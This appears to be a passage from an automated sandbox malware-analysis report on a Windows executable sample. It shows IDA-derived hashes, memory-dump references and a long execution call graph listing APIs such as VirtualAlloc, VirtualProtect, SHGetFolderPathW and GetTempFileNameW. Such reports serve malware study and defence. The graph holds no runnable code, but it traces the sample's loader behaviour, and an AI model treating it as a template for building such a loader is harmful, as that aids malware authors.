                                                                    • Instruction ID: 4f33d5f43f79ff290aba1291039b422a3fd137411e72ffc7bb9e407406362d53
                                                                    • Opcode Fuzzy Hash: a44f12ad135a22f97608606533fe7126ffd357917123931733c1ac1fccfa0826
                                                                    • Instruction Fuzzy Hash: 20F0C261E0CA45C2E310AF34AA410B9A362FF597C1F409239DE4DD3692DF2CE182C324

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true
                                                                    • Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 682475483-0
                                                                    • Opcode ID: 07a5c0968da69d30ac8125b5aec9bec45e2b6413f89b4661317775645502ba2c
                                                                    • Instruction ID: 9d616f08a7be02b5e19b7d724165d9b83262b58c212509fd36fbcdcccd825ad8
                                                                    • Opcode Fuzzy Hash: 07a5c0968da69d30ac8125b5aec9bec45e2b6413f89b4661317775645502ba2c
                                                                    • Instruction Fuzzy Hash: 2401E825A09A02D6F6199F71ED542782262BF14B91F490039CE1DD3EEADF2CE995C318

                                                                    Execution Graph

                                                                    Execution Coverage:3.9%
                                                                    Dynamic/Decrypted Code Coverage:2.1%
                                                                    Signature Coverage:11.6%
                                                                    Total number of Nodes:931
                                                                    Total number of Limit Nodes:20
                                                                    execution_graph 31654 1b630f6273c 31655 1b630f6276a 31654->31655 31656 1b630f627c5 VirtualAlloc 31655->31656 31657 1b630f627ec 31655->31657 31656->31657 31658 7ff65022eda0 31659 7ff65022edc8 31658->31659 31660 7ff65022edae 31658->31660 31662 7ff65022edd6 31659->31662 31663 7ff65022eee0 InitializeCriticalSection 31659->31663 31661 7ff65022ee68 31660->31661 31664 7ff65022edbb 31660->31664 31667 7ff65022fff0 74 API calls 31660->31667 31676 7ff65022fff0 31661->31676 31663->31662 31666 7ff65022ee74 31668 7ff65022ee97 31666->31668 31672 7ff65022ee86 free 31666->31672 31669 7ff65022edfc 31667->31669 31670 7ff65022ee27 31669->31670 31674 7ff65022ee16 free 31669->31674 31671 7ff65022ee3a 31670->31671 31675 7ff65022eebe free 31670->31675 31671->31664 31673 7ff65022ee47 DeleteCriticalSection 31671->31673 31672->31666 31672->31668 31673->31661 31674->31669 31674->31670 31675->31670 31675->31671 31677 7ff650230048 31676->31677 31702 7ff650230006 31676->31702 31711 7ff650233cc0 31677->31711 31680 7ff650230011 31682 7ff650230088 calloc 31680->31682 31683 7ff650230019 31680->31683 31681 7ff65023005b 31733 7ff6502302a0 31681->31733 31685 7ff6502300a6 31682->31685 31686 7ff6502301ea abort 31682->31686 31687 7ff650230130 realloc 31683->31687 31688 7ff650230025 31683->31688 31760 7ff650235090 59 API calls 31685->31760 31705 7ff6502301f5 31686->31705 31687->31686 31693 7ff65023015b memset 31687->31693 31691 7ff650230037 31688->31691 31692 7ff6502300bb 31688->31692 31689 7ff650230067 31694 7ff6502301b8 31689->31694 31751 7ff6502305c0 31689->31751 31691->31666 31692->31691 31695 7ff650230190 malloc 31692->31695 31696 7ff6502300e1 malloc 31692->31696 31761 7ff650235090 59 API calls 31693->31761 31700 7ff6502301d8 memset 31694->31700 31695->31686 31699 7ff6502300f3 31695->31699 31696->31686 31696->31699 31699->31700 31706 7ff65023010a memcpy 31699->31706 31704 7ff650230115 31700->31704 31701 7ff650230183 31701->31695 31707 7ff650235020 GetLastError 31702->31707 31704->31666 31705->31666 31706->31704 31762 7ff650232b00 31707->31762 31709 7ff65023503f 31710 7ff65023506d SetLastError 31709->31710 31710->31680 31712 7ff650233cdc 31711->31712 31715 7ff650233dd8 31711->31715 31713 7ff650233d28 31712->31713 31866 7ff650230cc0 31712->31866 31713->31681 31715->31681 31716 7ff650233ce6 31717 7ff6502302a0 11 API calls 31716->31717 31718 7ff650233cf5 31717->31718 31719 7ff650233d40 31718->31719 31721 7ff650233cfb 31718->31721 31720 7ff650232b00 54 API calls 31719->31720 31723 7ff650233d56 31720->31723 31722 7ff650233d04 31721->31722 31726 7ff650233dbb fprintf 31721->31726 31724 7ff6502305c0 3 API calls 31722->31724 31723->31715 31728 7ff650232b00 54 API calls 31723->31728 31725 7ff650233d0c 31724->31725 31888 7ff650230ed0 21 API calls 31725->31888 31726->31722 31730 7ff650233d70 31728->31730 31729 7ff650233d14 31729->31681 31730->31715 31731 7ff650232b00 54 API calls 31730->31731 31732 7ff650233d8c 31731->31732 31732->31715 31732->31722 31734 7ff6502302b7 31733->31734 31735 7ff650230300 31733->31735 31736 7ff650230310 31734->31736 31738 7ff6502302cb 31734->31738 31742 7ff650230329 31734->31742 31743 7ff650230370 GetCurrentThreadId 31734->31743 31889 7ff650230220 malloc 31735->31889 31736->31689 31740 7ff6502302e0 GetCurrentThreadId 31738->31740 31741 7ff6502302d4 31738->31741 31739 7ff650230308 31739->31734 31739->31736 31740->31689 31741->31689 31744 7ff6502303a8 CreateEventA 31742->31744 31745 7ff650230331 31742->31745 31743->31741 31743->31742 31746 7ff6502303e0 GetLastError 31744->31746 31747 7ff6502303c0 31744->31747 31745->31738 31750 7ff650230353 31745->31750 31890 7ff650237280 QueryPerformanceCounter GetTickCount QueryPerformanceFrequency WaitForSingleObject WaitForSingleObject 31745->31890 31747->31745 31748 7ff6502303cf CloseHandle 31747->31748 31748->31745 31750->31689 31752 7ff6502305f8 31751->31752 31753 7ff6502305d2 31751->31753 31891 7ff650230220 malloc 31752->31891 31755 7ff6502305de 31753->31755 31758 7ff650230624 GetCurrentThreadId 31753->31758 31759 7ff6502305ea 31753->31759 31757 7ff650230658 SetEvent 31755->31757 31755->31759 31756 7ff6502305fd 31756->31753 31756->31759 31757->31759 31758->31755 31758->31759 31759->31702 31760->31692 31761->31701 31763 7ff650232cf0 31762->31763 31770 7ff650232b1d 31762->31770 31764 7ff650236e20 17 API calls 31763->31764 31766 7ff650232cf5 31764->31766 31765 7ff650232ce5 31765->31709 31769 7ff650236e20 17 API calls 31766->31769 31766->31770 31768 7ff650232b49 31771 7ff650232ba0 TlsGetValue 31768->31771 31772 7ff650232b50 TlsGetValue 31768->31772 31769->31770 31770->31765 31774 7ff650232b41 31770->31774 31839 7ff650232110 34 API calls 31770->31839 31775 7ff650232b6e 31771->31775 31776 7ff650232bb4 31771->31776 31772->31775 31772->31776 31774->31768 31840 7ff650236e20 GetCurrentProcessId 31774->31840 31775->31709 31799 7ff650231c50 31776->31799 31777 7ff650232b85 31777->31772 31778 7ff650232b8f 31777->31778 31778->31771 31781 7ff650236e20 17 API calls 31778->31781 31782 7ff650232b99 31781->31782 31782->31771 31783 7ff650232bcb GetCurrentThreadId CreateEventA 31784 7ff650232c03 31783->31784 31785 7ff650232c0c GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 31784->31785 31786 7ff650232d5d 31784->31786 31787 7ff6502525a6 abort 31785->31787 31788 7ff650232c70 GetThreadPriority 31785->31788 31860 7ff650231fe0 GetCurrentThreadId _ultoa OutputDebugStringA abort 31786->31860 31797 7ff6502525ac 31787->31797 31790 7ff650232d38 31788->31790 31791 7ff650232ca3 TlsSetValue 31788->31791 31793 7ff650236e20 17 API calls 31790->31793 31791->31787 31796 7ff650232cc1 31791->31796 31795 7ff650232d3d 31793->31795 31795->31791 31798 7ff650236e20 17 API calls 31795->31798 31796->31709 31797->31797 31798->31791 31800 7ff650231c6c 31799->31800 31801 7ff650231d90 31799->31801 31804 7ff6502302a0 11 API calls 31800->31804 31802 7ff650236e20 17 API calls 31801->31802 31803 7ff650231d95 31802->31803 31803->31800 31806 7ff650236e20 17 API calls 31803->31806 31805 7ff650231c87 31804->31805 31807 7ff650231c8f 31805->31807 31808 7ff650236e20 17 API calls 31805->31808 31806->31800 31809 7ff650231c9a 31807->31809 31812 7ff650231d05 31808->31812 31810 7ff650231d2c calloc 31809->31810 31811 7ff650231cb0 31809->31811 31814 7ff650231d54 31810->31814 31815 7ff650231d43 31810->31815 31861 7ff650231170 20 API calls 31811->31861 31812->31809 31818 7ff650231d14 31812->31818 31821 7ff650236e20 17 API calls 31814->31821 31824 7ff650231d6a 31814->31824 31862 7ff650231170 20 API calls 31815->31862 31816 7ff650231cb8 31819 7ff650231ccc 31816->31819 31826 7ff650236e20 17 API calls 31816->31826 31827 7ff650231dc5 31816->31827 31822 7ff650236e20 17 API calls 31818->31822 31830 7ff650231cd8 31819->31830 31831 7ff650236e20 17 API calls 31819->31831 31820 7ff650231d4b 31820->31814 31823 7ff650231ef0 free 31820->31823 31821->31824 31822->31809 31823->31814 31825 7ff650231ce3 31824->31825 31829 7ff650231d80 31824->31829 31824->31830 31828 7ff6502305c0 3 API calls 31825->31828 31832 7ff650231e25 31826->31832 31827->31819 31835 7ff650236e20 17 API calls 31827->31835 31833 7ff650231cec 31828->31833 31834 7ff650236e20 17 API calls 31829->31834 31830->31825 31831->31824 31832->31819 31832->31827 31836 7ff650236e20 17 API calls 31832->31836 31833->31775 31833->31783 31834->31825 31837 7ff650231eba 31835->31837 31836->31827 31837->31819 31838 7ff650236e20 17 API calls 31837->31838 31838->31819 31841 7ff650236e43 CreateMutexA WaitForSingleObject 31840->31841 31843 7ff650237096 31841->31843 31844 7ff650236f56 FindAtomA 31841->31844 31864 7ff650236ca0 6 API calls 31843->31864 31846 7ff650236f68 AddAtomA 31844->31846 31847 7ff650236fe1 GetAtomNameA 31844->31847 31852 7ff650236fac _onexit 31846->31852 31853 7ff650237083 31846->31853 31849 7ff6502370b6 31847->31849 31856 7ff650237019 31847->31856 31848 7ff6502370a2 CloseHandle 31848->31777 31865 7ff650236ca0 6 API calls 31849->31865 31855 7ff650236fbf ReleaseMutex CloseHandle 31852->31855 31863 7ff650236ca0 6 API calls 31853->31863 31858 7ff650236fd8 31855->31858 31856->31855 31859 7ff65023706e _onexit 31856->31859 31857 7ff65023708f 31857->31858 31858->31777 31859->31855 31861->31816 31862->31820 31863->31857 31864->31848 31865->31856 31867 7ff650230df0 31866->31867 31870 7ff650230cde 31866->31870 31868 7ff650236e20 17 API calls 31867->31868 31869 7ff650230df5 31868->31869 31869->31870 31872 7ff650236e20 17 API calls 31869->31872 31871 7ff650230d0b 31870->31871 31873 7ff650236e20 17 API calls 31870->31873 31875 7ff650230d32 calloc 31871->31875 31879 7ff650230d40 31871->31879 31872->31870 31874 7ff650230dc5 31873->31874 31874->31871 31877 7ff650236e20 17 API calls 31874->31877 31878 7ff650230e94 31875->31878 31880 7ff650230e7e 31875->31880 31877->31871 31881 7ff650236e20 17 API calls 31878->31881 31882 7ff650236e20 17 API calls 31879->31882 31883 7ff650230d65 31879->31883 31880->31879 31884 7ff650230e99 31881->31884 31882->31883 31885 7ff650236e20 17 API calls 31883->31885 31887 7ff650230d6f 31883->31887 31884->31880 31886 7ff650236e20 17 API calls 31884->31886 31885->31887 31886->31880 31887->31716 31888->31729 31889->31739 31890->31745 31891->31756 31892 1b631163844 31893 1b631163866 31892->31893 31894 1b631163851 StrCmpNIW 31892->31894 31894->31893 31895 7ff6502332e0 31896 7ff650233308 31895->31896 31897 7ff6502332ef 31895->31897 31899 7ff65023330d 31896->31899 31900 7ff650233370 AddVectoredExceptionHandler 31896->31900 31898 7ff6502332f4 31897->31898 31901 7ff650233354 RemoveVectoredExceptionHandler 31897->31901 31899->31898 31902 7ff650236e20 17 API calls 31899->31902 31937 7ff650233325 31899->31937 31900->31898 31901->31898 31903 7ff6502335c5 31902->31903 31904 7ff650236e20 17 API calls 31903->31904 31903->31937 31905 7ff6502335e1 31904->31905 31905->31898 31910 7ff650236e20 17 API calls 31905->31910 31905->31937 31906 7ff6502333ab TlsGetValue 31906->31898 31907 7ff6502333bf 31906->31907 31908 7ff6502333c9 31907->31908 31909 7ff650233470 31907->31909 31911 7ff6502333da 31908->31911 32022 7ff650233040 93 API calls 31908->32022 31912 7ff650233550 31909->31912 31913 7ff650233482 31909->31913 31916 7ff6502335ff 31910->31916 31918 7ff6502333fb 31911->31918 31919 7ff6502333e4 CloseHandle 31911->31919 31914 7ff65023355b 31912->31914 31915 7ff650233555 CloseHandle 31912->31915 31920 7ff650233487 CloseHandle 31913->31920 31921 7ff65023348d 31913->31921 32028 7ff650230790 CloseHandle free 31914->32028 31915->31914 31932 7ff650236e20 17 API calls 31916->31932 31916->31937 32023 7ff650230790 CloseHandle free 31918->32023 31919->31918 31923 7ff6502333f8 CloseHandle 31919->31923 31920->31921 31924 7ff6502334af 31921->31924 31925 7ff6502334b4 31921->31925 31923->31918 32025 7ff650233040 93 API calls 31924->32025 31929 7ff650233628 31925->31929 31930 7ff6502334ca 31925->31930 31927 7ff65023356e 31927->31898 31939 7ff650233641 31927->31939 32029 7ff650230790 CloseHandle free 31929->32029 31934 7ff6502334dc CloseHandle 31930->31934 31935 7ff6502334e2 31930->31935 31931 7ff650233417 31938 7ff65023342a 31931->31938 31931->31939 31932->31937 31934->31935 32026 7ff650230790 CloseHandle free 31935->32026 31937->31898 31937->31906 31941 7ff650233446 31938->31941 32024 7ff650232190 33 API calls 31938->32024 32030 7ff650231fe0 GetCurrentThreadId _ultoa OutputDebugStringA abort 31939->32030 31940 7ff6502334f3 31940->31939 31945 7ff650233504 31940->31945 31944 7ff650233452 31941->31944 31948 7ff650236e20 17 API calls 31941->31948 31946 7ff6502335a8 31944->31946 31947 7ff65023345d TlsSetValue 31944->31947 31949 7ff650233520 31945->31949 32027 7ff650232190 33 API calls 31945->32027 31947->31898 31950 7ff650233531 31948->31950 31949->31944 31957 7ff650236e20 17 API calls 31949->31957 31950->31946 31954 7ff65023353b 31950->31954 31955 7ff6502335a1 31950->31955 31954->31947 31959 7ff650236e20 17 API calls 31954->31959 31955->31946 31957->31950 31959->31944 32022->31911 32023->31931 32025->31925 32026->31940 32028->31927 32029->31927 32031 7ff650236d30 CreateMutexA WaitForSingleObject 32032 7ff650236de8 32031->32032 32033 7ff650236d60 32031->32033 32040 7ff650236ca0 6 API calls 32032->32040 32035 7ff650236db8 FindAtomA 32033->32035 32039 7ff650236d77 32033->32039 32036 7ff650236e06 DeleteAtom 32035->32036 32037 7ff650236dca ReleaseMutex CloseHandle 32035->32037 32036->32037 32038 7ff650236df4 CloseHandle 32039->32037 32040->32038 32041 1b63116c0e4 32042 1b63116c0fd 32041->32042 32043 1b63116c0f9 32041->32043 32056 1b63116ec90 60 API calls 32042->32056 32045 1b63116c102 32057 1b63116f1ec GetEnvironmentStringsW 32045->32057 32048 1b63116c11b 32079 1b63116c158 40 API calls 3 library calls 32048->32079 32049 1b63116c10f 32078 1b63116d744 9 API calls 2 library calls 32049->32078 32052 1b63116c123 32080 1b63116d744 9 API calls 2 library calls 32052->32080 32054 1b63116c142 32081 1b63116d744 9 API calls 2 library calls 32054->32081 32056->32045 32058 1b63116c107 32057->32058 32060 1b63116f21c 32057->32060 32058->32048 32058->32049 32082 1b63116f10c WideCharToMultiByte 32060->32082 32078->32043 32079->32052 32080->32054 32081->32043 32083 7ff6502214e0 32086 7ff650221190 32083->32086 32085 7ff6502214f6 32087 7ff65022148b GetStartupInfoW 32086->32087 32088 7ff6502211c4 32086->32088 32092 7ff6502213e4 32087->32092 32089 7ff6502211f1 Sleep 32088->32089 32095 7ff650221206 32088->32095 32089->32088 32090 7ff650221460 _initterm 32090->32095 32092->32085 32093 7ff650221261 SetUnhandledExceptionFilter 32093->32095 32094 7ff650221326 malloc 32097 7ff6502213ab 32094->32097 32103 7ff650221350 32094->32103 32095->32090 32095->32092 32095->32094 32096 7ff650221320 32095->32096 32105 7ff65022e5f0 32095->32105 32096->32094 32126 7ff65022e1f0 32097->32126 32100 7ff65022137d malloc memcpy 32100->32103 32104 7ff6502213a6 32100->32104 32103->32100 32103->32103 32104->32097 32110 7ff65022e620 32105->32110 32123 7ff65022e60f 32105->32123 32106 7ff65022e820 32107 7ff65022e814 32106->32107 32106->32123 32107->32106 32125 7ff65022e753 32107->32125 32255 7ff65022e480 8 API calls 32107->32255 32108 7ff65022e7c4 32112 7ff65022e7d9 32108->32112 32113 7ff65022e855 32108->32113 32109 7ff65022e861 32257 7ff65022e410 8 API calls 32109->32257 32110->32106 32110->32108 32110->32109 32121 7ff65022e6b1 32110->32121 32110->32123 32253 7ff65022e480 8 API calls 32112->32253 32256 7ff65022e410 8 API calls 32113->32256 32117 7ff65022e86d 32117->32093 32118 7ff65022e7ea 32254 7ff65022e480 8 API calls 32118->32254 32119 7ff65022e758 32122 7ff65022e78a VirtualProtect 32119->32122 32119->32123 32121->32108 32121->32113 32121->32118 32121->32119 32124 7ff65022e480 8 API calls 32121->32124 32121->32125 32122->32119 32123->32093 32124->32121 32125->32119 32127 7ff6502213be 32126->32127 32128 7ff65022e180 32126->32128 32142 7ff6502216c0 32127->32142 32258 7ff650226087 32128->32258 32262 7ff650252560 32128->32262 32265 7ff6502522e0 32128->32265 32308 7ff650252240 32128->32308 32371 7ff650226262 32128->32371 32375 7ff650226180 32128->32375 32379 7ff650225ee1 32128->32379 32384 7ff6502261fe 32128->32384 32388 7ff6502261bf 32128->32388 32392 7ff650226048 32128->32392 32396 7ff650225a88 32128->32396 32401 7ff650226009 32128->32401 32405 7ff6502260c6 32128->32405 32719 7ff65022f440 32142->32719 32146 7ff6502216fa GetTickCount64 32147 7ff650221720 32146->32147 32252 7ff650221708 32146->32252 32723 7ff650222f30 32147->32723 32150 7ff65022fff0 74 API calls 32151 7ff6502217ee 32150->32151 32152 7ff65022fff0 74 API calls 32151->32152 32153 7ff6502217fd 32152->32153 32153->32153 32735 7ff650222660 32153->32735 32155 7ff650221925 32156 7ff65022fff0 74 API calls 32155->32156 32157 7ff650221943 32156->32157 32158 7ff65022fff0 74 API calls 32157->32158 32160 7ff650221952 32158->32160 32159 7ff650222660 7 API calls 32161 7ff650221a0e 32159->32161 32160->32159 32160->32160 32162 7ff65022fff0 74 API calls 32161->32162 32163 7ff650221a28 32162->32163 32164 7ff65022fff0 74 API calls 32163->32164 32165 7ff650221a37 32164->32165 32165->32165 32166 7ff650222660 7 API calls 32165->32166 32167 7ff650221aeb SHGetFolderPathW GetModuleFileNameW SHGetFolderPathW 32166->32167 32168 7ff65022fff0 74 API calls 32167->32168 32169 7ff650221bb3 32168->32169 32170 7ff65022fff0 74 API calls 32169->32170 32172 7ff650221bc2 32170->32172 32171 7ff650221c4c wcscat 32173 7ff65022fff0 74 API calls 32171->32173 32172->32171 32172->32172 32174 7ff650221c75 32173->32174 32175 7ff65022fff0 74 API calls 32174->32175 32176 7ff650221c86 32175->32176 32176->32176 32177 7ff650222660 7 API calls 32176->32177 32178 7ff650221d4c 32177->32178 32179 7ff65022fff0 74 API calls 32178->32179 32180 7ff650221d84 32179->32180 32181 7ff65022fff0 74 API calls 32180->32181 32182 7ff650221d93 32181->32182 32183 7ff650221e07 _wcsicmp 32182->32183 32184 7ff65022242b 32183->32184 32185 7ff650221e1a 32183->32185 32741 7ff650224180 32184->32741 32186 7ff65022fff0 74 API calls 32185->32186 32188 7ff650221e6c 32186->32188 32190 7ff65022fff0 74 API calls 32188->32190 32189 7ff65022243b 32747 7ff650224260 32189->32747 32196 7ff650221e7b 32190->32196 32192 7ff650222459 32752 7ff6502215c0 32192->32752 32194 7ff65022246d 32759 7ff650222ee0 32194->32759 32198 7ff6502215c0 75 API calls 32196->32198 32197 7ff650222477 32200 7ff65022fff0 74 API calls 32197->32200 32218 7ff65022257d 32197->32218 32199 7ff650221f06 32198->32199 32202 7ff65022fff0 74 API calls 32199->32202 32203 7ff6502224a1 32200->32203 32205 7ff650221f4d 32202->32205 32206 7ff65022fff0 74 API calls 32203->32206 32204 7ff65022259b 32207 7ff65022fff0 74 API calls 32205->32207 32208 7ff6502224b0 32206->32208 32210 7ff650221f5c 32207->32210 32208->32208 32209 7ff650222660 7 API calls 32208->32209 32212 7ff650222567 32209->32212 32210->32210 32211 7ff650222ee0 GetLastError 32210->32211 32213 7ff650221fed 32211->32213 32216 7ff650224640 141 API calls 32212->32216 32213->32212 32214 7ff650221ff5 SHGetFolderPathW 32213->32214 32215 7ff65022fff0 74 API calls 32214->32215 32217 7ff65022205b 32215->32217 32216->32218 32219 7ff65022fff0 74 API calls 32217->32219 32763 7ff650224640 GetTempPathW GetTempFileNameW 32218->32763 32220 7ff65022206a 32219->32220 32221 7ff6502220db wcscat 32220->32221 32768 7ff650222790 168 API calls 32221->32768 32223 7ff6502220ee 32224 7ff65022fff0 74 API calls 32223->32224 32225 7ff6502220fe 32224->32225 32226 7ff65022fff0 74 API calls 32225->32226 32227 7ff65022210d 32226->32227 32228 7ff65022fff0 74 API calls 32227->32228 32229 7ff650222199 32228->32229 32230 7ff65022fff0 74 API calls 32229->32230 32231 7ff6502221a8 32230->32231 32231->32231 32232 7ff65022fff0 74 API calls 32231->32232 32233 7ff65022224f 32232->32233 32234 7ff65022fff0 74 API calls 32233->32234 32235 7ff65022225e 32234->32235 32236 7ff65022fff0 74 API calls 32235->32236 32237 7ff650222313 32236->32237 32238 7ff65022fff0 74 API calls 32237->32238 32240 7ff650222322 32238->32240 32239 7ff650222356 _wcsicmp 32241 7ff650222368 32239->32241 32242 7ff650222373 memset 32239->32242 32240->32239 32241->32242 32241->32252 32243 7ff650222391 32242->32243 32244 7ff650222396 32243->32244 32245 7ff650222410 32243->32245 32247 7ff6502215c0 75 API calls 32244->32247 32246 7ff6502215c0 75 API calls 32245->32246 32248 7ff6502223ac 32246->32248 32247->32248 32249 7ff650222ee0 GetLastError 32248->32249 32250 7ff6502223b7 32249->32250 32251 7ff650224640 141 API calls 32250->32251 32250->32252 32251->32252 32252->32092 32253->32118 32254->32107 32255->32107 32256->32109 32257->32117 32259 7ff650226093 32258->32259 32260 7ff6502524f2 malloc 32259->32260 32261 7ff650252513 32260->32261 32409 7ff650233df0 32262->32409 32264 7ff65025257e 32523 7ff650251750 malloc 32265->32523 32275 7ff65025232c 32276 7ff650251750 124 API calls 32275->32276 32277 7ff650252345 32276->32277 32278 7ff650249600 124 API calls 32277->32278 32279 7ff650252353 32278->32279 32280 7ff650251f10 124 API calls 32279->32280 32281 7ff650252369 32280->32281 32282 7ff650251aa0 124 API calls 32281->32282 32283 7ff650252374 32282->32283 32284 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32283->32284 32285 7ff65025237c 32284->32285 32286 7ff650251750 124 API calls 32285->32286 32287 7ff650252395 32286->32287 32288 7ff65024a720 124 API calls 32287->32288 32289 7ff6502523a3 32288->32289 32290 7ff650251f10 124 API calls 32289->32290 32291 7ff6502523b9 32290->32291 32292 7ff650251aa0 124 API calls 32291->32292 32293 7ff6502523c4 32292->32293 32294 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32293->32294 32295 7ff6502523cc 32294->32295 32296 7ff650251750 124 API calls 32295->32296 32297 7ff6502523e5 32296->32297 32298 7ff65024a8a0 124 API calls 32297->32298 32299 7ff6502523f3 32298->32299 32300 7ff650251f10 124 API calls 32299->32300 32301 7ff650252409 32300->32301 32302 7ff650251aa0 124 API calls 32301->32302 32303 7ff650252414 32302->32303 32304 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32303->32304 32305 7ff65025241c 32304->32305 32306 7ff6502524f2 malloc 32305->32306 32307 7ff650252513 32306->32307 32309 7ff650251750 123 API calls 32308->32309 32310 7ff650252255 32309->32310 32713 7ff650249ec0 32310->32713 32313 7ff650251f10 123 API calls 32314 7ff650252279 32313->32314 32315 7ff650251aa0 123 API calls 32314->32315 32316 7ff650252284 32315->32316 32718 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32316->32718 32318 7ff65025228c 32319 7ff650251750 123 API calls 32318->32319 32320 7ff6502522a5 32319->32320 32321 7ff65024a040 123 API calls 32320->32321 32322 7ff6502522b3 32321->32322 32323 7ff650251f10 123 API calls 32322->32323 32324 7ff6502522c9 32323->32324 32325 7ff650251aa0 123 API calls 32324->32325 32326 7ff6502522d4 32325->32326 32327 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32326->32327 32328 7ff6502522dc 32327->32328 32329 7ff650251750 123 API calls 32328->32329 32330 7ff6502522f5 32329->32330 32331 7ff65024a550 123 API calls 32330->32331 32332 7ff650252303 32331->32332 32333 7ff650251f10 123 API calls 32332->32333 32334 7ff650252319 32333->32334 32335 7ff650251aa0 123 API calls 32334->32335 32336 7ff650252324 32335->32336 32337 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32336->32337 32338 7ff65025232c 32337->32338 32339 7ff650251750 123 API calls 32338->32339 32340 7ff650252345 32339->32340 32341 7ff650249600 123 API calls 32340->32341 32342 7ff650252353 32341->32342 32343 7ff650251f10 123 API calls 32342->32343 32344 7ff650252369 32343->32344 32345 7ff650251aa0 123 API calls 32344->32345 32346 7ff650252374 32345->32346 32347 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32346->32347 32348 7ff65025237c 32347->32348 32349 7ff650251750 123 API calls 32348->32349 32350 7ff650252395 32349->32350 32351 7ff65024a720 123 API calls 32350->32351 32352 7ff6502523a3 32351->32352 32353 7ff650251f10 123 API calls 32352->32353 32354 7ff6502523b9 32353->32354 32355 7ff650251aa0 123 API calls 32354->32355 32356 7ff6502523c4 32355->32356 32357 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32356->32357 32358 7ff6502523cc 32357->32358 32359 7ff650251750 123 API calls 32358->32359 32360 7ff6502523e5 32359->32360 32361 7ff65024a8a0 123 API calls 32360->32361 32362 7ff6502523f3 32361->32362 32363 7ff650251f10 123 API calls 32362->32363 32364 7ff650252409 32363->32364 32365 7ff650251aa0 123 API calls 32364->32365 32366 7ff650252414 32365->32366 32367 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32366->32367 32368 7ff65025241c 32367->32368 32369 7ff6502524f2 malloc 32368->32369 32370 7ff650252513 32369->32370 32372 7ff65022626e 32371->32372 32373 7ff6502524f2 malloc 32372->32373 32374 7ff650252513 32373->32374 32374->32374 32376 7ff65022618c 32375->32376 32377 7ff6502524f2 malloc 32376->32377 32378 7ff650252513 32377->32378 32381 7ff650225eed 32379->32381 32380 7ff6502259e0 32380->32128 32381->32380 32382 7ff6502524f2 malloc 32381->32382 32383 7ff650252513 32382->32383 32385 7ff65022620a 32384->32385 32386 7ff6502524f2 malloc 32385->32386 32387 7ff650252513 32386->32387 32389 7ff6502261cb 32388->32389 32390 7ff6502524f2 malloc 32389->32390 32391 7ff650252513 32390->32391 32393 7ff650226054 32392->32393 32394 7ff6502524f2 malloc 32393->32394 32395 7ff650252513 32394->32395 32398 7ff650225aa9 32396->32398 32397 7ff6502259e2 32397->32128 32398->32397 32399 7ff6502524f2 malloc 32398->32399 32400 7ff650252513 32399->32400 32402 7ff650226015 32401->32402 32403 7ff6502524f2 malloc 32402->32403 32404 7ff650252513 32403->32404 32406 7ff6502260d2 32405->32406 32407 7ff6502524f2 malloc 32406->32407 32408 7ff650252513 32407->32408 32410 7ff650233e0d 32409->32410 32411 7ff6502343b0 32409->32411 32412 7ff650233e20 32410->32412 32415 7ff650236e20 17 API calls 32410->32415 32411->32264 32413 7ff6502340d5 32412->32413 32414 7ff650233e2b 32412->32414 32520 7ff650238290 101 API calls 32413->32520 32519 7ff650238290 101 API calls 32414->32519 32418 7ff6502340bd 32415->32418 32418->32414 32420 7ff6502340cb 32418->32420 32419 7ff650233e3b 32422 7ff650236e20 17 API calls 32419->32422 32434 7ff650233e47 32419->32434 32420->32413 32421 7ff650236e20 17 API calls 32420->32421 32421->32413 32423 7ff6502340f2 32422->32423 32425 7ff650234218 32423->32425 32426 7ff650236e20 17 API calls 32423->32426 32423->32434 32424 7ff65023423b 32429 7ff65023403c 32424->32429 32432 7ff650236e20 17 API calls 32424->32432 32441 7ff650234085 32424->32441 32425->32424 32427 7ff650236e20 17 API calls 32425->32427 32430 7ff650234339 32425->32430 32426->32434 32427->32430 32428 7ff650236e20 17 API calls 32431 7ff65023409f 32428->32431 32429->32431 32437 7ff650236e20 17 API calls 32429->32437 32438 7ff650234271 32429->32438 32429->32441 32430->32429 32433 7ff650236e20 17 API calls 32430->32433 32430->32441 32450 7ff650236e20 17 API calls 32431->32450 32466 7ff65023428b 32431->32466 32432->32429 32436 7ff6502342dc 32433->32436 32434->32425 32440 7ff650233ec0 32434->32440 32462 7ff650236e20 17 API calls 32434->32462 32435 7ff650233f28 32439 7ff650233f31 32435->32439 32442 7ff650236e20 17 API calls 32435->32442 32436->32424 32445 7ff650236e20 17 API calls 32436->32445 32437->32441 32448 7ff650236e20 17 API calls 32438->32448 32438->32466 32439->32429 32446 7ff65023438b 32439->32446 32451 7ff650236e20 17 API calls 32439->32451 32455 7ff650233f7b 32439->32455 32464 7ff6502348dd 32439->32464 32486 7ff650234601 32439->32486 32440->32435 32447 7ff650234290 32440->32447 32459 7ff650236e20 17 API calls 32440->32459 32441->32428 32441->32431 32443 7ff65023452a 32442->32443 